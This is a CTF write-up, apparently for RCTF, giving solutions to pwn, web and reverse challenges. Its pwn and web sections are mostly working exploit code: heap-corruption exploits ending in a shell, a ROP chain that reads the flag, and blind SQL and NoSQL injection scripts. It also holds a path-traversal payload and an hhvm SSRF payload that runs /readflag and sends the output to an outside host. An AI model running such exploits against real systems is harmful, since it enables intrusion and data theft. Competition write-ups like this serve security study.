fvtbl=leakoff(496+148//4)
libc_base=fvtbl-libc.sym['_IO_file_jumps']
print(hex(libc_base))
bin_sh=next(libc.search(b"/bin/sh\x00"))+libc_base
system=libc_base+libc.sym['system']
#gdb.attach(p,"b free\nc\n")
editoff(496,0)
editoff((0xf7fcd8d0-0xf7fcc5c0)//4,system)
editoff(496,0)
editoff(496,0)
fvtbl+=0xE0-0x80-8
editoff(496+72//4+1,u32(b';sh\x00'))
editoff(496+148//4,fvtbl)
p.interactive()
catch_the_frog
The input uses the Native Object Protocols (libnop) wire format.
We compiled a libnop binary ourselves and, reversing against that symbolized build, found the serialized object to be a struct of the form:
std::int32_t age_years; std::uint64_t height_inches; std::uint64_t weight_pounds; std::string name;
Following the libnop documentation we wrote an interactive C++ helper.
Talking to the challenge through the binary below plus a Python script, what remains is a glibc 2.27 heap-overflow menu challenge.
#include <cstdint>
#include <iostream>
#include <sstream>
#include <string>
#include <vector>
#include <nop/serializer.h>
#include <nop/structure.h>
#include <nop/utility/stream_writer.h>
#include <array>
#include <cstdint>
#include <iostream>
#include <map>
#include <sstream>
#include <string>
#include <vector>
#include <nop/serializer.h>
#include <nop/utility/die.h>
#include <nop/utility/stream_reader.h>
#include <nop/utility/stream_writer.h>
namespace example {
struct Person {
std::int32_t age_years;
std::uint64_t height_inches;
std::uint64_t weight_pounds;
std::string name;
NOP_STRUCTURE(Person, age_years, height_inches, weight_pounds, name);
};
} // namespace example
int main(int argc, char** argv) {
using Writer = nop::StreamWriter<std::stringstream>;
nop::Serializer<Writer> serializer;
int32_t opcode;
uint64_t index;
uint64_t size;
std::string input;
std::cout << "opcode: " << std::endl;
std::cin >> opcode;
std::cout << "index: " << std::endl;
std::cin >> index;
std::cout << "size: " << std::endl;
std::cin >> size;
std::cout << "input: " << std::endl;
std::cin >> input;
serializer.Write(example::Person{opcode, index, size, input});
const std::string data = serializer.writer().stream().str();
std::cout << data;
}
from pwn import *
cn = remote("124.70.137.88", 10000)
#cn = process("./catch_the_frog")
def message(opcode, index, size, input):
p = process("./gg")
p.sendlineafter("opcode: \n", str(opcode))
p.sendlineafter("index: \n", str(index))
p.sendlineafter("size: \n", str(size))
p.sendlineafter("input: \n", input)
message = p.recvall()
return message
def freed(index):
t = message(0, index, 0 , "a")
cn.sendlineafter(" a request, length:", str(len(t)))
cn.sendafter("Reading request:", t)
def create(size):
t = message(1, 0, size, "a")
cn.sendlineafter(" a request, length:", str(len(t)))
cn.sendafter("Reading request:", t)
def read(index, input):
t = message(2, index, 0, input)
cn.sendlineafter(" a request, length:", str(len(t)))
cn.sendafter("Reading request:", t)
def write(index):
t = message(3, index, 0, "a")
cn.sendlineafter(" a request, length:", str(len(t)))
cn.sendafter("Reading request:", t)
def free(index):
t = message(4, index, 0, "a")
cn.sendlineafter(" a request, length:", str(len(t)))
cn.sendafter("Reading request:", t)
create(0xb0)
create(0xb0)
create(0xb0)
create(0xb0)
create(0xb0)
create(0xb0)
create(0xb0)
create(0xb0) #7
create(0x10)
for i in range(8):
    free(i)
create(0x50) #0
write(0)
cn.recvuntil("Greeting from ")
tmp = cn.recv(6)
addr = u64(tmp + b"\x00\x00")
free_hook = addr + 0x1b98
sys_addr = addr - 0x39c800
print(hex(addr))
create(0x80) #1
create(0x150) #2
create(0x30) #4
create(0x60) #4
create(0x60) #5
for i in range(8):
    freed(2)
read(2, b"b" * 0xf8 + p64(0xa1))
free(4)
free(5)
create(0x90) #4
read(4, b"c" * 0x70 + p64(free_hook))
create(0x60) #5
create(0x60) #6
print(pidof(cn))
read(6, p64(sys_addr))
read(5, "/bin/sh\x00")
free(5)
success(hex(free_hook))
success(hex(sys_addr))
cn.interactive()
unistruct
C++ reversing: a vector of variant (size=32); type1=int, type2=float, type3=std::string, type4=vector.
When editing a vector you can choose append; when the new size exceeds the vector's capacity, it grows via realloc, but the iterator still points at the old address, so you can write over the range [old iterator address, end of the new vector storage].
This amounts to a one-shot arbitrary read/write over an address range in the heap segment.
Plan: leak libc via the unsorted bin, then attack __free_hook via tcache.
from pwn import *
context.log_level='debug'
context.terminal=["tmux","splitw","-h"]
libc=ELF("libc.so.6")#ELF("/glibc/2.27/64/lib/libc-2.27.so")
p=remote('124.70.137.88',40000)#process("./unistruct")
#gdb.attach(p)
sla=lambda x,y:p.sendlineafter(x.encode('ascii'),y.encode('ascii'))
def alloc(idx,size):
    sla("Choice","1")
    sla("Index",str(idx))
    sla("Type","4")
    sla("Value",str(size))
def free(idx):
    sla("Choice","4")
    sla("Index",str(idx))
def show(idx):
    sla("Choice","3")
    sla("Index",str(idx))
def enter_edit(idx):
    sla("Choice","2")
    sla("Index",str(idx))
def edit0():
    p.recvuntil(b"Old value:")
    return int(p.recvline())
def edit1(val,inplace=False):
    if inplace:
        sla("place","1")
    else:
        sla("place","0")
    sla("New",str(val))
alloc(0,1) #attack
alloc(1,1) #pad
alloc(5,1) #pad2
alloc(2,512) #unsorted leak
alloc(3,1) #pad
alloc(4,8) #pad2
free(2) #2 in unsorted
free(4) #4 in tcache
free(1) #1 in tcache
'''gdb.attach(p)
p.interactive()
exit(0)'''
enter_edit(0)
for i in range(4):
    edit0(),edit1(0)
for i in range(24):
    v=edit0()
    edit1(v,1)
v=edit0()
edit1(v,1)
v1=edit0()
edit1(v1,1)
leak_libc=((v1<<32)|v)-0x7f5dde669ca0+0x7f5dde27e000
edit0(),edit1(0xCAFEBABE,1) #exit
print(hex(leak_libc))
#gdb.attach(p)
free_hook=leak_libc+libc.sym['__free_hook']
system=leak_libc+libc.sym['system']
alloc(6,1) #victim
alloc(7,16) #realloc target
alloc(8,1)
print("alloc done")
#input()
free(7)
free(6)
enter_edit(0)
for i in range(4):
    edit0(),edit1(0)
#now get victim! at 0x20.2
edit0(),edit1(free_hook&0xffffffff,1)
edit0(),edit1(free_hook>>32,1)
edit0(),edit1(0xCAFEBABE,1) #exit
alloc(9,2)
enter_edit(9)
edit0(),edit1(system&0xffffffff,1)
edit0(),edit1(system>>32,1)
enter_edit(3)
edit0(),edit1(26739,1)
p.interactive()
warmnote
The edit function has an off-by-one null-byte overflow.
Since allocation goes through calloc (musl mallocng), you also have to forge the meta structures in a rather bizarre way.
from pwn import *
def add(size,title,note):
    s.sendlineafter(b">>",b"1")
    s.sendlineafter(b"Size: ",str(size).encode())
    s.sendafter("Title: ",title)
    s.sendafter("Note: ",note)
def show(idx):
    s.sendlineafter(b">>",b"2")
    s.sendlineafter(b"Index: ",str(idx).encode())
def free(idx):
    s.sendlineafter(b">>",b"3")
    s.sendlineafter(b"Index: ",str(idx).encode())
def edit(idx,note):
    s.sendlineafter(b">>",b"4")
    s.sendlineafter(b"Index: ",str(idx).encode())
    s.sendafter(b"Note: ",note)
# s = process("./warmnote")
s = remote("124.70.137.88","20000")
add(0x30,b'A'*16,b'A'*0x30)
add(0x30,b'A'*16,b'A'*0x30)
add(0x30,b'A'*16,b'A'*0x30)
free(0)
free(1)
add(0x30,b'A'*16,b'A'*0x30)
add(0xa9c,b'A'*16,b'dead\n')
show(1)
libc = ELF("./libc.so")
libc.address = u64(s.recvuntil("\x7f")[-6:]+b"\x00\x00")+0x1ff0
success(hex(libc.address))
secret_addr = libc.address+0xb4ac0
s.sendlineafter(b">>",b"666")
s.sendlineafter(b"[IN]: ",str(secret_addr).encode())
s.recvuntil(b"[OUT]: ")
secret = u64(s.recv(8))
success(hex(secret))
free(2)
free(3)
free(0)
stdin_FILE = libc.address+0xb4180
fake_mem_addr = libc.address-0xac0
fake_meta_addr = libc.address-0xff0
fake_mem = p64(fake_meta_addr)+p64(1)
sc = 10 # 0xbc
freeable = 1
last_idx = 1
maplen = 2
fake_meta = p64(stdin_FILE-0x18)#next
fake_meta += p64(fake_mem_addr)#priv
fake_meta += p64(fake_mem_addr)
fake_meta += p64(2)
fake_meta += p64((maplen << 12) | (sc << 6) | (freeable << 5) | last_idx)
fake_meta += p64(0)
payload = p64(0xdeadbeef)*2+b'\x00'*1344+p64(secret)+b'\x00'*8+fake_meta
add(0xa98,b'A'*16,payload+b"\n")#0
add(0xa9c,b'A'*16,p64(stdin_FILE-0x10)+p64(0)+p64((maplen << 12) | (sc << 6) | (freeable << 5) | last_idx)+p64(0)+b"\n")#2
# gdb.attach(s,"dir ./mallocng\nb free\nc")
edit(0,payload.ljust(0xa90,b"\x00")+fake_mem[:0x8])
free(2)
add(0xbc,b'A'*16,b"123\n")#0
fake_meta = p64(stdin_FILE-0x18)#next
fake_meta += p64(fake_mem_addr)#priv
fake_meta += p64(stdin_FILE-0x10)
fake_meta += p64(2)
fake_meta += p64((maplen << 12) | (sc << 6) | (freeable << 5) | last_idx)
fake_meta += p64(0)
payload = p64(0xdeadbeef)*2+b'\x00'*1344+p64(secret)+b'\x00'*8+fake_meta+b"\n"
free(0)
add(0xa9c,b'A'*16,payload)
# gdb.attach(s,"b *$rebase(0x1306)\nc")
s.sendlineafter(b">>",b"1")
s.sendlineafter(b"Size: ",str(0xbc).encode())
s.sendafter("Title: ",b'A'*16)
stdout_FILE=libc.address+0xb4280
ret = libc.address+0x00000000000152a2
pop_rdi = libc.address+0x00000000000152a1
pop_rsi = libc.address+0x000000000001dad9
pop_rdx = libc.address+0x000000000002cdae
mov_rsp = libc.address+0x000000000007b1f5
syscall = libc.address+0x00000000000238f0
pop_rcx = libc.address+0x0000000000016dd5
pop_rax = libc.address+0x0000000000016a96
payload = p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(stdout_FILE-70)+p64(pop_rdx)+p64(0x300)
payload += p64(libc.sym['read'])
payload = payload.ljust(64,b'\x00')
payload += b'A'*32+p64(1)+p64(1)+p64(stdout_FILE-64)+p64(ret)+p64(3)+p64(mov_rsp)+b"\n"
s.send(payload)
payload = b'./flag\x00'
payload = payload.ljust(30,b'\x00')
payload += p64(pop_rdi)+p64(stdout_FILE-70)+p64(pop_rsi)+p64(0)+p64(pop_rax)+p64(2)+p64(syscall)
payload += p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(stdout_FILE+0x100)+p64(pop_rdx)+p64(0x50)+p64(libc.sym['read'])
payload += p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(stdout_FILE+0x100)+p64(pop_rdx)+p64(0x500)+p64(libc.sym['write'])
s.send(payload)
s.interactive()
Web
ns_shaft_sql
#-*-coding=utf-8-*-
import requests
import base64
import threading
s = requests.Session()
url = "http://124.71.132.232:23334/"
def execute(query):
    global s,url
    query = base64.b64encode(query)
    res = s.get(url+"?sql="+query).text
    print(res)
    k = res.split("Your key is ")[1].split('\n')[0].strip()
    return k
def create_func():
    c_query = '''select 123;'''
    print(c_query)
    return execute(c_query)
k = create_func()
l = '''ASCII
CHAR_LENGTH
CHARACTER_LENGTH
CONCAT
CONCAT_WS
FIELD
FIND_IN_SET
FORMAT
INSERT
INSTR
LCASE
LEFT
LENGTH
LOCATE
LOWER
LPAD
LTRIM
MID
POSITION
REPEAT
REPLACE
REVERSE
RIGHT
RPAD
RTRIM
SPACE
STRCMP
SUBSTR
SUBSTRING
SUBSTRING_INDEX
TRIM
UCASE
UPPER
ABS
ACOS
ASIN
ATAN
ATAN2
AVG
CEIL
CEILING
COS
COT
COUNT
DEGREES
DIV
EXP
FLOOR
GREATEST
LEAST
LN
LOG
LOG10
LOG2
MAX
MIN
MOD
PI
POW
POWER
RADIANS
RAND
ROUND
SIGN
SIN
SQRT
SUM
TAN
TRUNCATE
ADDDATE
ADDTIME
CURDATE
CURRENT_DATE
CURRENT_TIME
CURRENT_TIMESTAMP
CURTIME
DATE
DATE_ADD
DATE_FORMAT
DATE_SUB
DATEDIFF
DAY
DAYNAME
DAYOFMONTH
DAYOFWEEK
DAYOFYEAR
EXTRACT
FROM_DAYS
HOUR
LAST_DAY
LOCALTIME
LOCALTIMESTAMP
MAKEDATE
MAKETIME
MICROSECOND
MINUTE
MONTH
MONTHNAME
NOW
PERIOD_ADD
PERIOD_DIFF
QUARTER
SEC_TO_TIME
SECOND
STR_TO_DATE
SUBDATE
SUBTIME
SYSDATE
TIME
TIME_FORMAT
TIME_TO_SEC
TIMEDIFF
TIMESTAMP
TO_DAYS
WEEK
WEEKDAY
WEEKOFYEAR
YEAR
YEARWEEK
BIN
BINARY
CASE
CAST
COALESCE
CONNECTION_ID
CONV
CONVERT
CURRENT_USER
DATABASE
IF
IFNULL
ISNULL
LAST_INSERT_ID
NULLIF
SESSION_USER
SYSTEM_USER
USER
VERSION
ENCRYPT
MD5
OLD_PASSWORD
PASSWORD'''
l = l.split("\n")
for i in l:
execute("set @@sql_mode:=(select concat(0x22,v) from s where `k`='"+k+"')/*"+i+"
(1,1,1)*/;")
import requests as req
chars = '0123456789abcdef'
ans = ''
j = 0
for pos in range(1,64):
    for ch in chars:
        data = {'username':'rabbit','password[$regex]':'^'+ans+ch+'.*$'}
        res = req.post('http://123.60.21.23:23333/user/login',data )
        #res = req.post('http://127.0.0.1:3000/user/login',data )
        if 'Bad' in res.text:
            ans += ch
            break
    print(pos,ans)
VerySafe
?list+install+--installroot+/tmp/+http://49.234.52.70:8080/++++++++++++++$&f=pearcmd&
hiphop
hhvm/4.126.0
Set hhvm.debugger.vs_debug_enable=1 to enable the debugging extension, and hhvm.debugger.vs_debug_listen_port=<port> to optionally change the port the debugger listens on (default: 8999).
The target server is started roughly as:
hhvm -m server -dhhvm.server.thread_count=100 -dhhvm.http.default_timeout=1 -dhhvm.server.connection_timeout_seconds=1 -dhhvm.debugger.vs_debug_enable=1 -dhhvm.server.port=8080 -dhhvm.repo.central.path=/tmp/hhvm.hhbc -dhhvm.pid_file=/tmp/hhvm.pid -dhhvm.server.whitelist_exec=true -dhhvm.server.allowed_exec_cmds[]= -dhhvm.server.request_timeout_seconds=1 -dopen_basedir=/var/www/html
import requests
import urllib
import json
payload = '''%7b%22command%22%3a%22attach%22%2c%22arguments%22%3a%7b%22name%22%3a%22hhvm%3a%20attach%20to%20server%22%2c%22type%22%3a%22hhvm%22%2c%22request%22%3a%22attach%22%2c%22host%22%3a%22localhost%22%2c%22port%22%3a8998%2c%22remotesiteroot%22%3a%22%2fvar%2fwww%2fpublic%2f%22%2c%22localworkspaceroot%22%3a%22%2fvar%2fwww%2fpublic%2f%22%2c%22__configurationtarget%22%3a5%2c%22__sessionid%22%3a%22052f86e6-5d6a-4e7c-b049-a4ffa373b365%22%2c%22sandboxuser%22%3a%22wupco%22%7d%2c%22type%22%3a%22request%22%2c%22seq%22%3a2%7d%00%7b%22command%22%3a%22initialize%22%2c%22arguments%22%3a%7b%22clientid%22%3a%22vscode%22%2c%22clientname%22%3a%22visual%20studio%20code%22%2c%22adapterid%22%3a%22hhvm%22%2c%22pathformat%22%3a%22path%22%2c%22linesstartat1%22%3atrue%2c%22columnsstartat1%22%3atrue%2c%22supportsvariabletype%22%3atrue%2c%22supportsvariablepaging%22%3atrue%2c%22supportsruninterminalrequest%22%3atrue%2c%22locale%22%3a%22zh-cn%22%2c%22supportsprogressreporting%22%3atrue%2c%22supportsinvalidatedevent%22%3atrue%2c%22supportsmemoryreferences%22%3atrue%7d%2c%22type%22%3a%22request%22%2c%22seq%22%3a1%7d%00%7b%22command%22%3a%22evaluate%22%2c%22arguments%22%3a%7b%22expression%22%3a%22file%28%27http%3a%2f%2fphp.ebcece08.o53.xyz%2f%3ftest%27%29%3b%22%2c%22context%22%3a%22repl%22%7d%2c%22type%22%3a%22request%22%2c%22seq%22%3a3%7d%00'''
payload = urllib.unquote(payload)
phpcode = '''
$handle = popen("/readflag", "r");
$read = fread($handle, 2096);
file('http://php.ebcece08.o53.xyz/?a='.urlencode($read));
'''
phpcode = json.dumps(phpcode)
payload = payload.replace("\"file('http://php.ebcece08.o53.xyz/?test');\"", phpcode)
print(payload)
payload = urllib.quote(urllib.quote(payload))
payload = "gopher://127.0.0.1:8999/_"+payload
requests.get("http://124.71.132.232:58080/?url="+payload)
Easyphp
/login/..;/admin gets past nginx; since Flight urldecodes the URL once automatically, %3flogin slips past Flight's check for the login characters in the URL.
Finally, read the file with a doubly URL-encoded path:
/login/..;/admin%3flogin=aa&data=%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%36%36%25%36%63%25%36%31%25%36%37
xss it?
Bypass DOMPurify 2.3.1, the latest version at the time.
https://github.com/cure53/DOMPurify/wiki/Security-Goals-&-Threat-Model#non-goals
Consider CSS reflection:
https://github.com/dxa4481/cssInjection
?asoul={"compileDebug":1,"filename":"aaaa\u2028function%20escapeFn(){alert(__lines)}//","client":false,"jiaran":"a","xiangwan":"b","beila":"c","jiale":"d","nailin":"e"}
EasySQLi
# -*- coding:utf8 -*-
import requests
import string
str1 = '_1234567890'+string.ascii_letters+string.punctuation
flag = ''
select = 'select/**/user()'
url="http://124.71.132.232:11002/?order="
for j in range(1,66):
    for i in range(65,123):
        #payload="updatexml(1,if(substr(({}),{},1)='{}',repeat('a',40000000),0),1)".format(select, j, i)
        payload="updatexml(1,if(ascii(substr(({}),{},1))='{}',concat(repeat('a',40000000),repeat('a',40000000),repeat('a',40000000),repeat('a',40000000),repeat('b',10000000)),1),1)".format(select, j, i)
        url1 = url + payload
        req = requests.get(url1)
        print(req.elapsed.total_seconds())
        #print(payload)
        if req.elapsed.total_seconds() > 1.6 or req.elapsed.total_seconds()< 1:
            flag += chr(i)
            print(payload)
            print(flag)
            break
(...remaining flag anti-duplicating checks...)
Reverse
sakuretsu
Program Logic:
Pipes Game
Key Logic:
main → 413C20 (wrapper)
→ 413150 (main checker, connects tubes using DFS in an iterative way)
→ 4126B0 (checks if a direction needs to be processed)
→ 412A00 (checks whether two blocks' tubes can be connected)
Reverse Engineering Techniques Used:
Std Library Function Recovery: Compiled a Swift project with swift build -v --static-swift-stdlib -c release, then did function matching with Lumina
Swift Calling Convention Fixing: see
https://github.com/eaplatanios/swift-language/blob/master/docs/ABI/RegisterUsage.md
Use usercall and return_ptr to manually correct calling convention
Swift Internal Learning & Experiment: Use Compiler Explorer, with option -emit-sil
Manual structure recovery for the block class and the checker class
Defining getters and setters helps a lot
Debugging Helper:
Setting up log point on:
0x412A00 (connected block)
0x4135E6 (current block)
0x413B1F (on fail)
arr = Qword(GetRegValue('r13') + 32) + 32
print("target - x:%d y:%d rotate:%d, bits:%d%d%d%d" %
(
Qword(GetRegValue('r13') + 16), Qword(GetRegValue('r13') + 24),
Qword(GetRegValue('r13') + 48),
Byte(arr),
Byte(arr+1),
Byte(arr+2),
Byte(arr+3),
)
)
arr = Qword(GetRegValue('r13') + 32) + 32
print("currnt - x:%d y:%d rotate:%d, bits:%d%d%d%d op:%d" %
(
Qword(GetRegValue('r13') + 16), Qword(GetRegValue('r13') + 24),
Qword(GetRegValue('r13') + 48),
Byte(arr),
Byte(arr+1),
Byte(arr+2),
Byte(arr+3),
GetRegValue('rax')
)
)
c = Qword(GetRegValue('rbp') - 0x1c8)
arr = Qword(c + 32) + 32
print("failfr - x:%d y:%d rotate:%d, bits:%d%d%d%d op:%d" %
(
Qword(c + 16), Qword(c + 24), Qword(c + 48),
Byte(arr),
Byte(arr+1),
Byte(arr+2),
Byte(arr+3),
Dword(GetRegValue('rbp') - 0x228)
)
)
c = Qword(GetRegValue('rbp') - 0x28)
arr = Qword(c + 32) + 32
print("failto - x:%d y:%d rotate:%d, bits:%d%d%d%d" %
(
Qword(c + 16), Qword(c + 24), Qword(c + 48),
Byte(arr),
Byte(arr+1),
Byte(arr+2),
Byte(arr+3),
)
)
Solving:
Data Extract & Manual recover: L → R
Flag Construct:
GOOD = [ # dumped from last step
[6, 7, 3, 4, 3, 6, 3],
[8, 8, 14, 1, 10, 8, 10],
[2, 4, 13, 7, 11, 6, 9],
[14, 5, 5, 11, 12, 13, 3],
[10, 4, 7, 11, 4, 7, 9],
[8, 4, 9, 14, 1, 14, 3],
[4, 5, 5, 9, 4, 9, 8],
]
ORI = [ # dumped from last step
[3, 11, 6, 2, 12, 9, 12],
[4, 1, 7, 2, 10, 4, 5],
[1, 8, 13, 13, 7, 6, 12],
[14, 10, 5, 13, 3, 7, 3],
[5, 2, 11, 7, 4, 14, 3],
[8, 8, 12, 7, 2, 11, 6],
[2, 5, 10, 3, 2, 9, 8],
]
FINAL = [
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
]
for i in range(7):
    for j in range(7):
        for t in range(4):
            if ((ORI[i][j] >> t) | (ORI[i][j] << (4 - t))) & 0xf == GOOD[i][j]:
                FINAL[j][i] = t
for i in range(7):
    print(FINAL[i])
ret = ''
retmask = ''
for i in range(7):
    for j in range(7):
        c = str((FINAL[i][j]) % 4)
        ret += c
        if ORI[j][i] in (5, 10):
            retmask += 'X'
        else:
            retmask += c
print(ret)
print(retmask)
Final Brute-force:
from pwn import *
from itertools import product
ori = '3330303311331213023333123131221201323021202330110'
mar = '3330X03311X31X130X33X31231312X1201323021202X30110'
count = mar.count('X')
idxes = []
for i in range(49):
if mar[i] == 'X':
idxes.append(i)
new_cases = []
for each in product([2,0], repeat=count):
new_case = list(ori)
for i, idx in enumerate(idxes):
new_case[idx] = str( (int(new_case[idx]) + each[i]) % 4)
new_cases.append(''.join(new_case))
for each in new_cases:
p = process(['./re',each])
ret = p.recvall()
if 'oops' not in ret:
print(each)
print(ret)
        exit(1)
Final Flag: RCTF{3330103311331013023313123131201201323021202330110}
LoongArch
Only a handful of instructions matter: clo.d checks whether a register has 64 one-bits, i.e. the comparison data taken from the stack XORed with the encrypted data must equal 0xffffffffffffffff. So first invert the bitrev.8b instruction, then bytepick.d, then bitrev.d, and finally undo the xor with the key.
# _*_ coding:utf-8 _*_
path = r"newLoongArch\output"
output = open(path, 'rb').read()
output = list(output)
cmp_data = output[32:] # the last 32 bytes are the comparison data
key = output[:32] # the first 32 bytes are the key
key[:8] = key[:8][::-1] # data is read from the stack, little-endian
key[8:16] = key[8:16][::-1]
key[16:24] = key[16:24][::-1]
key[24:] = key[24:][::-1]
cmp_data[:8] = cmp_data[:8][::-1]
cmp_data[8:16] = cmp_data[8:16][::-1]
cmp_data[16:24] = cmp_data[16:24][::-1]
cmp_data[24:] = cmp_data[24:][::-1]
key0 = 0x8205f3d105b3059d
key1 = 0xa89aceb3093349f3
key2 = 0xd53db5adbcabb984
key3 = 0x39cea0bfd9d2c2d4
for i in range(len(cmp_data)):
    cmp_data[i] = cmp_data[i] ^ 0xff
def rev_bitrev(ch):
    bin_string = "{:08b}".format(ch)
    bin_string = bin_string[::-1]
    ret = eval('0b' + bin_string)
    return ret
def rev_bitrevd(data):
    bin_string = "{:064b}".format(data)
    return eval('0b' + bin_string[::-1])
def rev_bytepickd(t0, t1, t2, t3, sa3):
    new_data = [0]*32
    new_data[:sa3] = t1[8-sa3:]
    new_data[sa3:8] = t2[:8-sa3]
    new_data[8:8+sa3] = t2[8-sa3:]
    new_data[sa3+8:16] = t0[:8-sa3]
    new_data[16:16+sa3] = t0[8-sa3:]
    new_data[16+sa3:24] = t3[:8-sa3]
    new_data[24:24+sa3] = t3[8-sa3:]
    new_data[24+sa3:] = t1[:8-sa3]
    return new_data
# invert bitrev.8b
for i in range(32):
    cmp_data[i] = rev_bitrev(cmp_data[i])
    # print(hex(cmp_data[i]), end=', ')
# invert bytepick.d
t0 = cmp_data[:8]
t1 = cmp_data[8:16]
t2 = cmp_data[16:24]
t3 = cmp_data[24:]
print(t0, t1, t2, t3)
cmp_data = rev_bytepickd(t0, t1, t2, t3, 3)
hex_string0 = ''
hex_string1 = ''
hex_string2 = ''
hex_string3 = ''
for i in range(8):
    hex_string0 += '{:02x}'.format(cmp_data[i])
print(hex_string0)
for j in range(8, 16):
    hex_string1 += '{:02x}'.format(cmp_data[j])
print(hex_string1)
for k in range(16, 24):
    hex_string2 += '{:02x}'.format(cmp_data[k])
print(hex_string2)
for m in range(24, 32):
    hex_string3 += '{:02x}'.format(cmp_data[m])
print(hex_string3)
real_hex_string = ''
last0 = rev_bitrevd(eval('0x' + hex_string0))
last1 = rev_bitrevd(eval('0x' + hex_string1))
last2 = rev_bitrevd(eval('0x' + hex_string2))
last3 = rev_bitrevd(eval('0x' + hex_string3))
real_hex_string += "{:08x}".format(last0)
real_hex_string += "{:08x}".format(last0)
real_hex_string += "{:08x}".format(last0)
real_hex_string += "{:08x}".format(last1)
import binascii
print(binascii.unhexlify(hex(key0 ^ last0)[2:]).decode(encoding="utf-8")[::-1], end='')
print(binascii.unhexlify(hex(key1 ^ last1)[2:]).decode(encoding="utf-8")[::-1], end='')
print(binascii.unhexlify(hex(key2 ^ last2)[2:]).decode(encoding="utf-8")[::-1], end='')
print(binascii.unhexlify(hex(key3 ^ last3)[2:]).decode(encoding="utf-8")[::-1])
Valgrind
Found the constant 0x4ec4ec4f; a web search shows it corresponds to taking a value mod 26
(http://www.flounder.com/multiplicative_inverse.htm).
Digits and letters are encrypted differently.
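For reference, 0x4EC4EC4F is the standard compiler "magic number" for unsigned division by 26 (M = ceil(2**35 / 26)), which is why the constant pins the cipher to mod-26 arithmetic; a quick check for 32-bit inputs:
M = 0x4EC4EC4F            # == (2**35 + 25) // 26
for x in (0, 25, 26, 1000, 2**32 - 1):
    q = (x * M) >> 35     # the strength-reduced x // 26 a compiler emits
    assert q == x // 26 and x - 26 * q == x % 26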
Hi!Harmony!
UCB RISC-V reversing.
Search the strings, find "welcome", and xref it to locate the main function; it is an odd cipher. Executing it by hand yields the output
KDUPRQBGUHDPLWSRVVLEOH; wrap it in rctf and you are done.
RCTF{KDUPRQBGUHDPLWSRVVLEOH}
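A quick check confirms the cipher is a Caesar shift of +3 (the plaintext reads HARMONYDREAMITPOSSIBLE, though the accepted flag wraps the raw ciphertext):
enc = "KDUPRQBGUHDPLWSRVVLEOH"
print("".join(chr((ord(c) - ord('A') - 3) % 26 + ord('A')) for c in enc))
# HARMONYDREAMITPOSSIBLE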
dht
A distributed hash table, multi-threaded Rust.
a = 't1me_y0u_enj0y_wa5t1ng_wa5_not_wa5ted'
number= '0123456789'
table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
for i in a:
    if i not in number:
        print(table[((ord(i)+3-90)%26)-1],end='')
    else:
        print(chr(ord(i)+3),end='')
__map={}
__map['110']=['3e0','a71','332','852','1e2','cb3','b05','915','c25','f45','765','0a7','848','4a8','cc8','fc8','b79','82a','adb','d5c','16e','34f']
__map['96']=['9d0','772','492','ef3','654','775','4c5','987','5d7','0d8','81b','efb','53c','f3d','5bd','0dd','5dd']
__map['118']=['7f0','241','741','ba2','4f2','893','754','445','095','3b6','957','208','038','3b8','66a','26d','73f','66f','dff']
__map['141']=['611','c93','644','774','6a4','e56','cc6','ec6','587','8a8','c99','a9b','daf','4bf','ecf','def']
__map['127']=['1d0','1e0','352','f52','795','d76','bb6','d47','3c7','748','658','fe8','f7b','bbb','36c','e8d','6de','3cf']
__map['149']=['aa0','a53','704','114','d34','5f4','b06','c77','139','99a','fea','beb','28c','bec','27d','c6f','28f']
__map['145']=['cd0','b82','c82','7d3','f15','046','b66','2c7','459','bc9','b5b','38c','2bc','8ec','a3f','79f']
__map['150']=['701','941','a41','551','af1','722','f43','c64','615','995','f86','196','5a7','ee7','17a','c2b','57b','9fb','f2c','a2d','31e','d9e','11f']
__map['146']=['e00','a50','744','b76','7ca','ffb','53e','ccf']
__map['194']=['300','440','db0','a32','582','0b4','b35','a19','669','c89','d9b','ddb','92c','ddd','ced','03e','abe','d5f','36f','88f','bcf']
__map['207']=['980','651','b72','4d2','556','ab8','07b','59b','65c','53d','e8e','afe','98f']
__map['197']=['531','e41','1c1','b75','2a5','786','b77','bb7','bd7','b19','0ab','c7c','5ed','26e','28e','17f','59f','dbf']
__map['235']=['2a0','761','7f2','184','905','126','9e7','c88','dc8','0d9','97a','9bb','22e','59e']
__map['25']=['200','0d0','c81','9a1','f02','415','586','3c6','93b','87c','aec','23d','79d','bfd','c0e','83e','f7f','4af','8ff']
number=[0x6E, 0x60, 0x76, 0x8D, 0x7F, 0x95, 0x91, 0x96, 0x92, 0xC2, 0xCF, 0xC5, 0xEB, 0x19] # ans with duplicates removed
ans=[0x6E, 0x60, 0x76, 0x8D, 0x7F, 0x95, 0x91, 0x6E, 0x96, 0x92, 0xC2, 0xCF, 0xC5, 0xC5, 0xEB, 0x19]
alp="0123456789abcdef"
times = [0 for i in range(1000)]
for i in ans:
    times[i] += 1
__invmap={}
ttt=[]
for i in number:
    for j in __map[str(i)]:
        ttt.append(j)
        __invmap[j] = i
def dfs(dep , flag):
    if dep == 16:
        print(flag[:-2])
        return
    last = flag[-2:]
    for i in alp:
        _tmp_str = last + i
        if _tmp_str in ttt:
            if times[__invmap[_tmp_str]] != 0:
                times[__invmap[_tmp_str]] -= 1
                dfs(dep+1, flag + i)
                times[__invmap[_tmp_str]] += 1
for i in number:
    for j in __map[str(i)]:
        times[__invmap[j]] -= 1
        dfs(1, j)
        times[__invmap[j]] += 1
two_shortest
SGU OJ problem 185 written in Pascal: minimum-cost maximum flow.
The graph is built with an adjacency matrix and the indices are not bounds-checked, giving an arbitrary write in the bss segment.
Reversing shows that sub_424960 can execute /bin/sh -c arg1.
sub_417FE0 is the exit function; it calls off_4E9730(unk_4E8340).
Use the overflow to overwrite off_4E9730 with sub_424960.
off_4E9730 is a function pointer and unk_4E8340 is an int.
Overwrite unk_4E8340 with the address of a /bin/sh string (without PIE, the address fits in 32 bits).
When the program exits, you get a shell.
1 2
453 145 4367680
456 221 4344160
